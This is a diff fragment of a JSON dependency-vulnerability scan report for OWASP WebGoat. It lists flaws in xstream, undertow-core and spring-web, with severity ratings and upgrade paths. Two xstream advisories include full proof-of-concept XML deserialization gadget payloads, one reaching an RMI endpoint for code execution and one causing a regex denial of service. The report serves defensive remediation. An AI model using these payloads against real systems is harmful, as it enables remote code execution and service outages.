-        },
-        "id": "00000023-0000-4000-8000-000000000023",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "io.undertow:undertow-core",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-undertow",
-                          "version": "3.1.9"
-                        },
-                        {
-                          "name": "io.undertow:undertow-core",
-                          "version": "2.3.12.Final"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000023-0000-4000-8000-000000000023",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "LGPL-2.1 license",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-data-jpa",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.hibernate.orm:hibernate-core",
-                  "version": "6.2.13.Final"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000024-0000-4000-8000-000000000024",
-          "locations": [
-            {
-              "package": {
-                "name": "org.hibernate.orm:hibernate-core",
-                "version": "6.2.13.Final"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {},
-          "title": "LGPL-2.1 license"
-        },
-        "id": "00000024-0000-4000-8000-000000000024",
-        "links": {},
-        "relationships": {},
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.\r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'\u003e\r\n        \u003cindexMap class='com.sun.xml.internal.ws.client.ResponseContext'\u003e\r\n          \u003cpacket\u003e\r\n            \u003cmessage class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'\u003e\r\n              \u003cdataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'\u003e\r\n                \u003cbridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'\u003e\r\n                  \u003cbridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'\u003e\r\n                    \u003cbi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'\u003e\r\n                      \u003cjaxbType\u003ecom.sun.rowset.JdbcRowSetImpl\u003c/jaxbType\u003e\r\n                      \u003curiProperties/\u003e\r\n                      \u003cattributeProperties/\u003e\r\n                      \u003cinheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'\u003e\r\n                        \u003cgetter\u003e\r\n                          \u003cclass\u003ecom.sun.rowset.JdbcRowSetImpl\u003c/class\u003e\r\n                          \u003cname\u003egetDatabaseMetaData\u003c/name\u003e\r\n                          \u003cparameter-types/\u003e\r\n                        \u003c/getter\u003e\r\n                      \u003c/inheritedAttWildcard\u003e\r\n                    \u003c/bi\u003e\r\n                    \u003ctagName/\u003e\r\n                    \u003ccontext\u003e\r\n                      \u003cmarshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'\u003e\r\n                        \u003couter-class reference='../..'/\u003e\r\n                      \u003c/marshallerPool\u003e\r\n                      \u003cnameList\u003e\r\n                        \u003cnsUriCannotBeDefaulted\u003e\r\n                          \u003cboolean\u003etrue\u003c/boolean\u003e\r\n                        \u003c/nsUriCannotBeDefaulted\u003e\r\n                        \u003cnamespaceURIs\u003e\r\n                          \u003cstring\u003e1\u003c/string\u003e\r\n                        \u003c/namespaceURIs\u003e\r\n                        \u003clocalNames\u003e\r\n                          \u003cstring\u003eUTF-8\u003c/string\u003e\r\n                        \u003c/localNames\u003e\r\n                      \u003c/nameList\u003e\r\n                    \u003c/context\u003e\r\n                  \u003c/bridge\u003e\r\n                \u003c/bridge\u003e\r\n                \u003cjaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'\u003e\r\n                  \u003cjavax.sql.rowset.BaseRowSet\u003e\r\n                    \u003cdefault\u003e\r\n                      \u003cconcurrency\u003e1008\u003c/concurrency\u003e\r\n                      \u003cescapeProcessing\u003etrue\u003c/escapeProcessing\u003e\r\n                      \u003cfetchDir\u003e1000\u003c/fetchDir\u003e\r\n                      \u003cfetchSize\u003e0\u003c/fetchSize\u003e\r\n                      \u003cisolation\u003e2\u003c/isolation\u003e\r\n                      \u003cmaxFieldSize\u003e0\u003c/maxFieldSize\u003e\r\n                      \u003cmaxRows\u003e0\u003c/maxRows\u003e\r\n                      \u003cqueryTimeout\u003e0\u003c/queryTimeout\u003e\r\n                      \u003creadOnly\u003etrue\u003c/readOnly\u003e\r\n                      \u003crowSetType\u003e1004\u003c/rowSetType\u003e\r\n                      \u003cshowDeleted\u003efalse\u003c/showDeleted\u003e\r\n                      \u003cdataSource\u003ermi://localhost:15000/CallRemoteMethod\u003c/dataSource\u003e\r\n                      \u003cparams/\u003e\r\n                    \u003c/default\u003e\r\n                  \u003c/javax.sql.rowset.BaseRowSet\u003e\r\n                  \u003ccom.sun.rowset.JdbcRowSetImpl\u003e\r\n                    \u003cdefault\u003e\r\n                      \u003ciMatchColumns\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                      \u003c/iMatchColumns\u003e\r\n                      \u003cstrMatchColumns\u003e\r\n                        \u003cstring\u003efoo\u003c/string\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                      \u003c/strMatchColumns\u003e\r\n                    \u003c/default\u003e\r\n                  \u003c/com.sun.rowset.JdbcRowSetImpl\u003e\r\n                \u003c/jaxbObject\u003e\r\n              \u003c/dataSource\u003e\r\n            \u003c/message\u003e\r\n            \u003csatellites/\u003e\r\n            \u003cinvocationProperties/\u003e\r\n          \u003c/packet\u003e\r\n        \u003c/indexMap\u003e\r\n      \u003c/comparator\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/sec",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000025-0000-4000-8000-000000000025",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 196
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
-        },
-        "id": "00000025-0000-4000-8000-000000000025",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.16"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000025-0000-4000-8000-000000000025",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.37.Final, 2.3.18.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/6b8e79c167ed57444ef6ea480316a5d64faf080b)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-undertow",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "io.undertow:undertow-core",
-                  "version": "2.3.10.Final"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000026-0000-4000-8000-000000000026",
-          "locations": [
-            {
-              "package": {
-                "name": "io.undertow:undertow-core",
-                "version": "2.3.10.Final"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "low"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 34
-            }
-          },
-          "title": "Memory Leak"
-        },
-        "id": "00000026-0000-4000-8000-000000000026",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "io.undertow:undertow-core",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-undertow",
-                          "version": "3.3.7"
-                        },
-                        {
-                          "name": "io.undertow:undertow-core",
-                          "version": "2.3.18.Final"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000026-0000-4000-8000-000000000026",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when using `UriComponentsBuilder` to parse an externally provided `URL` and perform validation checks on the host of the parsed URL. \r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.33, 6.0.18, 6.1.5 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0)\n- [Spring Advisory](https://spring.io/security/cve-2024-22259)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework:spring-web",
-                  "version": "6.0.13"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000027-0000-4000-8000-000000000027",
-          "locations": [
-            {
-              "package": {
-                "name": "org.springframework:spring-web",
-                "version": "6.0.13"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 140
-            }
-          },
-          "title": "Open Redirect"
-        },
-        "id": "00000027-0000-4000-8000-000000000027",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-web",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.1.10"
-                        },
-                        {
-                          "name": "org.springframework:spring-web",
-                          "version": "6.0.18"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000027-0000-4000-8000-000000000027",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` is used to parse an externally provided URL and perform validation checks on the host of the parsed URL. \r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22259](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790) and [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.34, 6.0.19, 6.1.6 or higher.\n## References\n- [PoC](https://github.com/Performant-Labs/CVE-2024-22262)\n- [Spring Advisory](https://spring.io/security/cve-2024-22262)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework:spring-web",
-                  "version": "6.0.13"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000028-0000-4000-8000-000000000028",
-          "locations": [
-            {
-              "package": {
-                "name": "org.springframework:spring-web",
-                "version": "6.0.13"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 90
-            }
-          },
-          "title": "Open Redirect"
-        },
-        "id": "00000028-0000-4000-8000-000000000028",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-web",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.1.11"
-                        },
-                        {
-                          "name": "org.springframework:spring-web",
-                          "version": "6.0.19"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000028-0000-4000-8000-000000000028",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. An attacker can manipulate the processed input stream and replace or inject objects, that result in executed evaluation of a malicious regular expression, causing a denial of service.\r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='javafx.collections.ObservableList$1'/\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n      \u003cdataHandler\u003e\r\n        \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n          \u003ccontentType\u003etext/plain\u003c/contentType\u003e\r\n          \u003cis class='java.io.SequenceInputStream'\u003e\r\n            \u003ce class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'\u003e\r\n              \u003citerator class='java.util.Scanner'\u003e\r\n                \u003cbuf class='java.nio.HeapCharBuffer'\u003e\r\n                  \u003cmark\u003e-1\u003c/mark\u003e\r\n                  \u003cposition\u003e0\u003c/position\u003e\r\n                  \u003climit\u003e0\u003c/limit\u003e\r\n                  \u003ccapacity\u003e1024\u003c/capacity\u003e\r\n                  \u003caddress\u003e0\u003c/address\u003e\r\n                  \u003chb\u003e\u003c/hb\u003e\r\n                  \u003coffset\u003e0\u003c/offset\u003e\r\n                  \u003cisReadOnly\u003efalse\u003c/isReadOnly\u003e\r\n                \u003c/buf\u003e\r\n                \u003cposition\u003e0\u003c/position\u003e\r\n                \u003cmatcher\u003e\r\n                  \u003cparentPattern\u003e\r\n                    \u003cpattern\u003e\\p{javaWhitespace}+\u003c/pattern\u003e\r\n                    \u003cflags\u003e0\u003c/flags\u003e\r\n                  \u003c/parentPattern\u003e\r\n                  \u003cfrom\u003e0\u003c/from\u003e\r\n                  \u003cto\u003e0\u003c/to\u003e\r\n                  \u003clookbehindTo\u003e0\u003c/lookbehindTo\u003e\r\n                  \u003ctext class='java.nio.HeapCharBuffer' reference='../../buf'/\u003e\r\n                  \u003cacceptMode\u003e0\u003c/acceptMode\u003e\r\n                  \u003cfirst\u003e-1\u003c/first\u003e\r\n                  \u003clast\u003e0\u003c/last\u003e\r\n                  \u003coldLast\u003e-1\u003c/oldLast\u003e\r\n                  \u003clastAppendPosition\u003e0\u003c/lastAppendPosition\u003e\r\n                  \u003clocals/\u003e\r\n                  \u003chitEnd\u003efalse\u003c/hitEnd\u003e\r\n                  \u003crequireEnd\u003efalse\u003c/requireEnd\u003e\r\n                  \u003ctransparentBounds\u003etrue\u003c/transparentBounds\u003e\r\n                  \u003canchoringBounds\u003efalse\u003c/anchoringBounds\u003e\r\n                \u003c/matcher\u003e\r\n                \u003cdelimPattern\u003e\r\n                  \u003cpattern\u003e(x+)*y\u003c/pattern\u003e\r\n                  \u003cflags\u003e0\u003c/flags\u003e\r\n                \u003c/delimPattern\u003e\r\n                \u003chasNextPosition\u003e0\u003c/hasNextPosition\u003e\r\n                \u003csource class='java.io.StringReader'\u003e\r\n                  \u003clock class='java.io.StringReader' reference='..'/\u003e\r\n                  \u003cstr\u003exxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\u003c/str\u003e\r\n                  \u003clength\u003e32\u003c/length\u003e\r\n                  \u003cnext\u003e0\u003c/next\u003e\r\n                  \u003cmark\u003e0\u003c/mark\u003e\r\n                \u003c/source\u003e\r\n              \u003c/iterator\u003e\r\n              \u003ctype\u003eKEYS\u003c/type\u003e\r\n            \u003c/e\u003e\r\n            \u003cin class='java.io.ByteArrayInputStream'\u003e\r\n              \u003cbuf\u003e\u003c/buf\u003e\r\n              \u003cpos\u003e0\u003c/pos\u003e\r\n              \u003cmark\u003e0\u003c/mark\u003e\r\n              \u003ccount\u003e0\u003c/count\u003e\r\n            \u003c/in\u003e\r\n          \u003c/is\u003e\r\n          \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n        \u003c/dataSource\u003e\r\n        \u003ctransferFlavors/\u003e\r\n      \u003c/dataHandler\u003e\r\n      \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n    \u003c/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found i",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000029-0000-4000-8000-000000000029",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 141
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
-        },
-        "id": "00000029-0000-4000-8000-000000000029",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.16"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000029-0000-4000-8000-000000000029",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). A remote attacker can request data from internal resources that are not publicly available by manipulating the processed input stream.\r\n\r\n*Note:* This vulnerability does not exist running Java 15 or higher, and is only relevant when using `XStream`'s default blacklist.\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.15 or higher.\n## References\n- [Exploit Repo](https://github.com/Al1ex/CVE-2020-26258)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6740c04b217aef02d44fba26402b35e0f6f493ce)\n- [XStream Advisory](https://x-stream.github.io/CVE-2020-26258.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26258.yaml)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000002b-0000-4000-8000-00000000002b",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 447
-            }
-          },
-          "title": "Server-Side Request Forgery (SSRF)"
-        },
-        "id": "0000002b-0000-4000-8000-00000000002b",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.15"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000002b-0000-4000-8000-00000000002b",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to HTTP Request Smuggling due to the interaction of quotation marks and delimiters in the `parseCookie()` function. An attacker can exfiltrate `HttpOnly` cookie values or smuggle extra cookie values.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.30.Final, 2.3.11.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/ea7ea2525d9acad0fcf8f3dfd4972f91394796ee)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/f72b2ef8114ad11bf9add501f3fae0f7bbd12128)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2166022)\n- [Red Hat Issues](https://issues.redhat.com/browse/UNDERTOW-2342)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-undertow",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "io.undertow:undertow-core",
-                  "version": "2.3.10.Final"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000002c-0000-4000-8000-00000000002c",
-          "locations": [
-            {
-              "package": {
-                "name": "io.undertow:undertow-core",
-                "version": "2.3.10.Final"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "critical"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 147
-            }
-          },
-          "title": "HTTP Request Smuggling"
-        },
-        "id": "0000002c-0000-4000-8000-00000000002c",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "io.undertow:undertow-core",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-undertow",
-                          "version": "3.1.9"
-                        },
-                        {
-                          "name": "io.undertow:undertow-core",
-                          "version": "2.3.12.Final"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000002c-0000-4000-8000-00000000002c",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
